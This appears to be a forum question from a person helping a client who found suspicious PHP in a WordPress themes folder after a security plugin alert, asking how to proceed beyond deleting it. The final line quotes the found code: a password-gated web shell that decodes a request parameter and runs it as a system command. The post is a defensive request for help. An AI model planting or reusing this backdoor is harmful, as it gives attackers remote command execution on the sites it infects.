A client asked me to take a look at some "malicious code" that his security plugin (WordFence) alerted him to. It was found in the /wp-content/themes folder.
When searching parts of the PHP code I am getting suspicious results with github repos and things labeled "hacker" and links in Russian and whatnot. I don't have too much doubt that it is malicious, but I don't know where to go from here beyond deleting the file.
$s=explode(":","99ca5f8858b3bd43cf30a4e7dc9417e8b8b53822:year:_cat");$q=$_REQUEST;if (sha1(md5($q[$s[1]]))===$s[0]){if (isset($q[$s[2]])){$l=base64_decode($q[$s[2]]);echo `$l`;}}
